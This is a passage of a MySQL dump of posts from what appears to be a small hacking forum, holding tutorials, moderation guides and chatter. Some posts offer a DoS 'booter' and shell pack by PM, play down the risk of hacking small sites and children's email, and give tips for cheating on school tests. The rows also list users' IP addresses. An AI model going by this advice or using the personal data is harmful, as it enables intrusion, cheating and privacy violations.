not. So if you suspect someone of lying don\'t reply and see what there reactions are. [size=large][color=#FFA500]Reactions Of a liar[/color][/size] •When some one is innocent he/she will often go on the offensive but a guilty person usually gets defensive. •Liars usually place there feet facing towards a exit. • A liar usually tries to distance themselves from you by putting something in-between you and him/her. •A liar will usually be uncomfortable when being questioned or accused and may turn away or turn his head away from the person. •Liars(well basically every one) tend to look up to the right to think,visualize or create a new responce. So look out for that. [size=large][color=#32CD32]Verbal speech and context[/color][/size] •A liar will usually answer your question with your question. Example: You: Did you eat my sandwich? Liar: No, I did not eat your sandwich •Liars usually go into much too much detail that they would not usually say. •Liars have longer pauses and shorter answers and longer times between a question and a response compared to some one who is just nervous. • A almost sure fire way to know if they are lying is if they answer questions that have not been asked and over answer question that have been answered. • Liars tend to use negative\'s rather then positive\'s. They may say stuff like \'I am not a liar while some one honest would more likely say \' I am a honest person\'. [size=large][color=#1E90FF]Tricks of a liar[/color][/size] •A good way to spot a liar is if you are accusing him/her, he/she will accuse you of the thing you are accusing them of in order to get the heat taken off of themselves. Even people that know this trick still get caught by it because you will become defensive yourself and explain that you have done nothing. • Say some one was accused of cheating, the liar might reply with something like \'\' I have never slept with that woman\'\' . explanation of that^ what liars will do is try to distance themselves from whatever they are lying about. [size=large][color=#FF1493]A few tests to see if some one is Lying to you[/color][/size] •Change the topic and see how easily the liar reacts such as relaxing and looking less stressed. • If you think he might be giving fake info ask him little detailed questions. It will probably take him a bit to come up with a answer. • Another thing you can do fallowing the trick above is ask him the same question a while later and if the story varies then he/she was lying. I am probably going to add more later this I just wanted to get this tut out hope you guys like it :)', '173.206.128.200', '-1378975544', '0', '0', '0', '0', '1', '8e1bf5a75e900e38807a898e2aa44c02', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('13', '4', '11', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '1', 't3h jok3r', '1339992181', '[quote=\'??????\' pid=\'11\' dateline=\'1339991371\'] This is a great tutorial you got there OP, Hopefully it will help some people out. [/quote] I felt like crying. Anyways nice tutorial, thanks for creating it :cool:', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '36e1657133eb7d1673b60482aacfa965', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('14', '6', '0', '4', 'Welcome to L33THacking.com', '0', '1', 't3h jok3r', '1339994562', 'Welcome to L33THacking.com. I am the founder of LH, the current and long term admins of LH are the following. [list] [*] [url=http://l33thacking.com/member.php?action=profile&uid=1]t3h jok3r[/url] :- Incharge of upgrades, help documents, theme and everything else which is NOT listed below. [*] [url=http://l33thacking.com/member.php?action=profile&uid=2]Apathy[/url] :- Incharge of reputation abuse and awards. [*] [url=http://l33thacking.com/member.php?action=profile&uid=3]??????[/url] :- Incharge of stolen accounts, stickies and bans. [/list] Feel free to contact any staff member anytime. If they are offline and you require immediate assistance or minor issues then please create a thread in the [url=http://l33thacking.com/forumdisplay.php?fid=3]Announcements, Feedback, Bugs and Suggestions[/url] section.', '72.229.164.105', '1223009385', '1', '0', '1', '1340074873', '1', '9fbfa838edde9c2d530e45e8d735045e', '0', '1340074873'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('19', '8', '18', '19', '[Junk]test for j', '0', '1', 't3h jok3r', '1339998582', 'This thread has been junked.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('18', '8', '0', '19', '[Junk]test for j', '0', '1', 't3h jok3r', '1339998552', 'test for j', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '2f3b1fc5f0e962b1efaeadb29c8f959a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('20', '1', '1', '2', 'tggfg', '0', '1', 't3h jok3r', '1339998836', 'This post has been junked.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('21', '10', '0', '5', '[tut]How to moderate L33THacking', '0', '1', 't3h jok3r', '1340001648', 'I\'m making a quick tutorial showing how to moderate specific stuff because this can come in handy for new mods. [u][b][size=large]Forum Actions[/size][/b][/u] [u][b]Split[/u][/b] For example... If someone posted a question and someone else posts their own question in someone elses thread. Then you select the post then go to moderation options and select [i]split thread[/i]. You will basically create a new thread in any forum of your choice. [u][b]Junk[/b][/u] Junk:- Automatically move a thread to our trash/junk forum. Only move threads that violate LH rules and regulations. You can junk a thread from the thread listing index. [spoiler][img]http://img98.imageshack.us/img98/8594/testqx.png[/img][/spoiler] Here is an example of the outcome [spoiler][img]http://img577.imageshack.us/img577/235/testpf.png[/img][/spoiler] So basically the threads title will change to [junk]TITLE, the moderator who posted it will auto post(this increase their post and we know who did it) and the thread gets closed. [u][b]Post Junk[/b][/u] You have to go to the thread, select the post then head down to inline moderation option and select \"junk post\". You can delete posts etc the same way. [spoiler][img]http://img39.imageshack.us/img39/5199/testol.png[/img][/spoiler] Outcome The post will be moved to the junk and the original post in the thread would be modified to \"This post has been removed due to violation of L33THacking rules.\" [size=large][u][b]Account[/b][/u][/size] Here is a picture of how it looks when you are a staff member. [spoiler][img]http://img855.imageshack.us/img855/8562/testgs.png[/img][/spoiler] Now I prefer the repfuck option to repfuck the user under the \"moderator options\" or you can us click on rate>repfuck and enter a custom reason. Normally if you do it the easy easy then it would look like this. [spoiler][img]http://img824.imageshack.us/img824/9448/testrf.png[/img][/spoiler] Another feature, Goodbyespammer. It\'s a tool that I would suggest you to use when a user is constantly spamming the forums non-stop even after warning. Here is a look at it with recommended settings. [spoiler][img]http://img72.imageshack.us/img72/5483/testra.png[/img][/spoiler] I would select all the options [b]except[/b] the first two which are \"delete threads and posts\". Which also means you would have to junk all their threads and posts but what you can do is go to all threads and all posts and use the inline junk/junk post tool. To Ban you can use any option if you are an admin. Because it doesn\'t matter. Modcp edit, you can only edit their profile, suspend posting and put them on \"moderate posts\". Admincp edit, you can edit anything. [b]Suspend posting[/b] :- Means that the user can\'t post at all, but they can browse the site. I would recommend you to [b]Moderate Posts[/b] When you put someone on moderate posts, then it means that a mod would have to approve/deny all their posts til a specific period. (You can set til when) EX. [spoiler][img]http://img259.imageshack.us/img259/6451/testwj.png[/img][/spoiler] So basically go to modcp>moderation quenue>you can ignore, delete or approve. I would either delete or approve. [size=large][u][b]MODCP[/b][/u][/size] [b]Reported posts[/b] You can either click the moderator notice above or go to modcp>reported posts. To remove it from modcp, select it and click on mark selected as read. [spoiler][img]http://img710.imageshack.us/img710/1682/testim.png[/img][/spoiler] You will have to visit the thread to take care of the post. So basically click on the thread then go to post 3 as shown in post ID in modcp. Then you can delete, junk or warn member. [b]Profile Editor[/b] :- Search for a member and edit their profile. [b]Banning[/b] :- See which member got banned, when and why also by which mod. Latest bans are at the top. [b]IP search[/b] :- Find out if someone has multiple accounts on LH. [size=large][u][b]Warning [/b][/u][/size] You can warn members via their post or profile. When you click on warn you will be taken to a page similar to this. P.S: You might have more warnings because we updated the warnings. [spoiler][img]http://img338.imageshack.us/img338/2383/testxx.png[/img][/spoiler] The admin notes are for admins, you could include a link or proof to let us or the user know why they got a warning. You can choose a reason or add a custom one, if you do then please provide proof in the admin notes. You can choose to send a PM to the member. You know how the warning looks already so I don\'t need to show you that part. But this time there will be a \"view\" option under details. This is how it looks after you click it. [spoiler][img]http://img39.imageshack.us/img39/9943/testlu.png[/img[/spoiler] To remove the warning, add a note in the revoke warning then click the revoke button below it. It will only remove the warning you are viewing. [b]Bans[/b] You know how to ban a member so I will skip that part. To unban the member, go to modcp>banning>[b]lift ban[/b] [size=x-large][b]Merge Users[/b][/size] Admincp>Users and Groups>Merge Users [i]Source Account:[/i] Account being merged. (Temp account) [i]Destination Account: [/i] Account to remain. (Perma account) Example: Ladder has 1 rep and 100 posts AND hum has 0 posts so we will merge hum to ladder. Example below. Source: hum Destination: Ladder That\'s all. Let me know if you have any questions. P.S: All admin and moderator PMs are logged and are viewable by me only via Admincp so if you fuck around with members or abuse your privileges I will ban you. All grammar and spelling errors are to be ignored in this thread. For admincp, every admin has a different secret pin. My first HQ post on my own website :D', '72.229.164.105', '1223009385', '1', '0', '1', '1347485511', '1', '5721dd78834a46095acdadb7166bde04', '0', '1347485511'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('23', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '2', 'Apathy', '1340038805', 'We should not be getting mods in till we are big...', '173.206.128.200', '-1378975544', '0', '0', '0', '0', '1', '19dd4f2c23b4245e4bb53185bf5c77b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('26', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '3', '??????????¢™', '1340054979', 'This will come in handy when we get bigger.', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'ffd029b84cfc81515e0208370ddd0e30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('27', '5', '12', '16', 'RE: How to spot a liar', '0', '3', '??????????¢™', '1340055114', 'Well this can come in handy when you are trying to spot a liar.', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'bed6a09aac25c32ac72706010bf5313d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('28', '11', '0', '15', '.EXE Booter Pack', '0', '3', '??????????¢™', '1340055626', '[i][align=center][size=x-large]Wassup LH members, Today I will be giving away a .EXE pack. The pack includes about 6 including doodies dos tool and Jays Shell + a Shell Checker.[/size][/align][/i] [b][i][align=center][size=x-large][color=#FFD700]To get this all you have to do is post below and PM me, This is to prevent unregistered members from getting them.[/align][/color][/size][/i][/b]', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'f634646b04a6b2575c752947c6a3be91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('29', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '1', 't3h jok3r', '1340062568', 'Thanks and AS I posted this for people who are new to mybb and don\'t know how to moderate.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '1beaed018caf266d5e1ce2dd3e72905c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('30', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '1', 't3h jok3r', '1340062645', 'Awesome. Nice giveaway, don\'t need it at the moment.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '43d25e6c50fd09754945199c2f88a268', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('31', '5', '12', '16', 'RE: How to spot a liar', '0', '1', 't3h jok3r', '1340063509', 'Luckily I didn\'t tell my girl to register otherwise she would\'ve dumped me after reading this :( BTW I was looking for this tutorial for the past 10 [s]seconds[/s] months, seriously.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3127b189de3105d61191ffea8f8bc6e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('32', '12', '0', '35', 'L33THacking userbar competition between t3h jok3r and apathy', '0', '1', 't3h jok3r', '1340066415', 'I have made two userbars for the elite group. 1. [img]http://img825.imageshack.us/img825/834/elite1.gif[/img] 2. [img]http://img849.imageshack.us/img849/2427/blanktemplatec.png[/img] APATHY By far not my best but oh well. First two attempts 1.[IMG]http://i.imgur.com/02fq3.gif[/IMG] 2.[IMG]http://i.imgur.com/VFRXJ.png[/IMG]', '72.229.164.105', '1223009385', '1', '0', '1', '1340076711', '1', 'e6a3332510c94411c2368de584be306d', '0', '1340076711'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('33', '12', '32', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '3', '??????????¢™', '1340071690', 'Joker: 1. I like 2. I like Apathy: 1. I like 2. I dont like Therefor the winner is JOKER!', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', '435d37e09a3bc9191482e23c06f77c16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('34', '12', '32', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '1', 't3h jok3r', '1340071909', 'OK but now between all three which one should we use?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '88b30fd354d30fdca8f91bff40e9ec7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('35', '12', '32', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '3', '??????????¢™', '1340074187', '1. Good because it is blue 2. Good because it is animate but if its not going to be animated on the forum then use the first one.', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'd00999e7f09a9b3e3c8b7244c3841e0b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('36', '12', '32', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '1', 't3h jok3r', '1340076744', 'Uh OK, anyways added to the upgrade page.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '4d19b59359247819695e2318ff8996b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('37', '6', '14', '4', 'RE: Welcome to L33THacking.com', '0', '4', 'Triple H', '1340077618', 'Thanks for the welcome and the list. I\'m so happy to be the first regular member of L33thacking', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'a48bbcb8974af511ad416fff80776333', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('38', '13', '0', '4', 'newbie', '0', '4', 'Triple H', '1340077670', 'Sup ppl? Im new out here and looking forward to learn some stuff.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '9c61e12308382466a121527d76d0bd4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('39', '14', '0', '8', 'Work Hard Play Hard-Rap', '0', '4', 'Triple H', '1340077789', 'This is my current favorite song. [video=youtube]http://www.youtube.com/watch?v=TWHNr0BrNgo[/video] The most repeated word reminds of someone right slim shady?', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '2991208128e88f349ca58c678ffe79a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('40', '5', '12', '16', 'RE: How to spot a liar', '0', '4', 'Triple H', '1340077866', 'Awesome and well-written tutorial. Nice and thanks for posting, gonna learn these today.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '8291a1d29e8b5ae8408ca7cfc21aa218', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('41', '15', '0', '9', 'Adf.ly>Earn $$$ by clicks on links', '0', '4', 'Triple H', '1340078109', '[size=large][u][b]What is Adf.ly?[/b][/u][/size] We are a free URL shortener service with a twist..get paid to share your links on the Internet! Just register for an account and start shrinking. You get paid for every person that visits your URLs. Example URL for hotspot shield: http://adf.ly/3oGgX Place your links on Twitter, forums, personal websites and any social networking sites. [size=large][u][b]Why choose Adf.ly?[/b][/u][/size] Earn more than $4.00 / 1000 visitors to your links. Get tiny URLs, great for when text space is limited. All advertising is strictly family-safe with no popups. Frequent statistics with revenue breakdown. Refer users and get a massive 20% commission. Many tools - Mass Shrinker, Easy Link, API. Easy-to-reach $5.00 minimum payout. Please use the referral below. http://adf.ly/?id=1108462 Have any questions? Post em below.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'aa1c031c36505f0e6cab79c6e3d25723', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('42', '16', '0', '11', 'Is Hacking legal or illegal?', '0', '4', 'Triple H', '1340078190', 'Title explains it all. Hoping some gud answers.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'd292abcb0f0a550e59a777ab95277f43', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('43', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '2', 'Apathy', '1340078377', 'Hacking is illegal, but hacking minor stuff such as small websites and kids emails etc would not draw much attention. L33THacking.com is for educational purposes only.', '173.206.138.77', '-1378973107', '0', '0', '0', '0', '1', '4be876e764a678ea5942508b42420579', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('44', '4', '13', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '3', '??????????¢™', '1340078942', '[quote=\'t3h jok3r\' pid=\'13\' dateline=\'1339992181\'] [quote=\'??????\' pid=\'11\' dateline=\'1339991371\'] This is a great tutorial you got there OP, Hopefully it will help some people out. [/quote] Why because it was originally your tutorial? I felt like crying. Anyways nice tutorial, thanks for creating it :cool: [/quote]', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', '517755e2e241ad31ac0a41fd3781784c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('45', '14', '39', '8', 'RE: Work Hard Play Hard-Rap', '0', '3', '??????????¢™', '1340079039', 'Yea I also love that song bro. Work Work Work Work', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', '1462d2c11d5043935b400d2e0f0467af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('46', '17', '0', '8', 'My Dubstep Remixs', '0', '3', '??????????¢™', '1340081822', '[b][i][size=xx-large][align=center]Hey guys, If you would like to listen to my dubstep remixes just go to the link below and please post here what you think about them.[/align][/i][/b][/size] [size=xx-large][align=center][url=soundcloud.com/RebornHF]My Soundcloud[/url][/align][/size]', '75.22.48.94', '1259745374', '1', '0', '3', '1340082013', '1', '7e2de5ea771b84a4dbc217d2b69d7b28', '0', '1340082013'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('47', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '2', 'Apathy', '1340123081', 'If you really made those I liked them keep it up.', '173.206.138.77', '-1378973107', '0', '0', '0', '0', '1', 'ef38f485f97beac4f94eb71d87505371', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('48', '12', '36', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '3', '??????????¢™', '1340142283', '[quote=\'t3h jok3r\' pid=\'36\' dateline=\'1340076744\'] Uh OK, anyways added to the upgrade page. [/quote] Okay I see it', '75.35.239.52', '1260646196', '1', '0', '0', '0', '1', 'f7b07142521b79b416661f6d73dba93f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('49', '18', '0', '2', 'star test', '0', '1', 't3h jok3r', '1340143700', '[img]http://png-5.findicons.com/files//icons/2232/wireframe_mono/16/star_fav.png[/img] Just checking how this star would look.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '64909191fc48ea7bbd0731f33b55b008', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('50', '11', '30', '15', 'RE: .EXE Booter Pack', '0', '3', '??????????¢™', '1340219666', '[quote=\'t3h jok3r\' pid=\'30\' dateline=\'1340062645\'] Awesome. Nice giveaway, don\'t need it at the moment. [/quote] Thanks, This will come in handy for some people.', '75.35.239.52', '1260646196', '1', '0', '0', '0', '1', 'e0adea191d7dfe85e80bc2aa5f676d90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('51', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '1', 't3h jok3r', '1340312248', 'True, by the way guests can not view threads anymore but I think keep this as a post here and pm me giveaway.', '41.151.131.242', '697795570', '1', '0', '0', '0', '1', '2fe594532fb20bf48303abca5a2e4113', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('52', '13', '38', '4', 'RE: newbie', '0', '1', 't3h jok3r', '1340317240', 'Welcome to L33THacking.com. Hope you enjoy the forums.', '41.151.135.161', '697796513', '1', '0', '0', '0', '1', '29f5c1daad50840ffc752b58094afc59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('53', '4', '44', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '4', 'Triple H', '1340514008', '[quote=\'??????\' pid=\'44\' dateline=\'1340078942\'] [quote=\'t3h jok3r\' pid=\'13\' dateline=\'1339992181\'] [quote=\'??????\' pid=\'11\' dateline=\'1339991371\'] This is a great tutorial you got there OP, Hopefully it will help some people out. [/quote] Why because it was originally your tutorial? I felt like crying. Anyways nice tutorial, thanks for creating it :cool: [/quote] [/quote] Lol I would say nice tutorial to the OP and t3h jok3r.', '41.174.14.8', '699272712', '0', '0', '0', '0', '1', 'a721e9c1bb66549f258943801d519d32', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('54', '19', '0', '16', '[tut]How to SE your school teachers', '0', '4', 'Triple H', '1340515684', 'This is a quick tutorial on how to SE your teachers. This SE will not guarantee you better grades and shit. [b][u]Step 1[/u][/b] Greet your teachers. Now don\'t be a decent nerd and say good morning and shit. Say something like what\'s up, how are you, howz it going, you look happy today or say wats up and do a hand shake. What this does is that teachers get to know you, they feel like they are your friend etc. [u][b]Step 2[/b][/u] On Mondays try asking your teachers how was their weekend but not everyweek. Also on Fridays say bye and enjoy your weekend by this you are being kind and polite. From this you would have their respect. Now what I do is that from this my teachers give me heads up and when we have an exam/test then I go to their table pretending that I\'m talking to him but look at the questions/answers. [b][u]Step 3[/u][/b] If you get caught talking then the first time say it wasn\'t your fault. Then what they do is they will keep their eye on you and you would obviously talk again so the second time you get caught say Ok, I\'m listening now. Also try to copy all the work on your chalk board/smart board. [b][u]Step 4[/u][/b] If possible try to act like you are doing your work, also get to class before the bell or maximum 3 mins late. Don\'t leave the class before the bell. [b][u]Step 5[/b][/u] Normally some teachers give out worksheets and homework to quickly so I normally finish all my homework at school by ignoring their dumbass lecture. Try to get all your homework done even late is ok cuz then they think you are trying hard. [u][b]Step 6[/b][/u] If you get bad grades in tests, projects or homeworks don\'t worry about it. Late they will feel bad/pity for you and try to help in tests etc. What my teachers do is they go around me and sometimes tell me if my answer is wrong. This gives me another chance to get a better grade. [u][b]Step 7[/b][/u] If you are going to lie to them then make sure you have a valid proof plus if you get caught walking around by a teacher say you are looking for a teacher or bathroom. Because they will think that you a good student so if you are looking for a 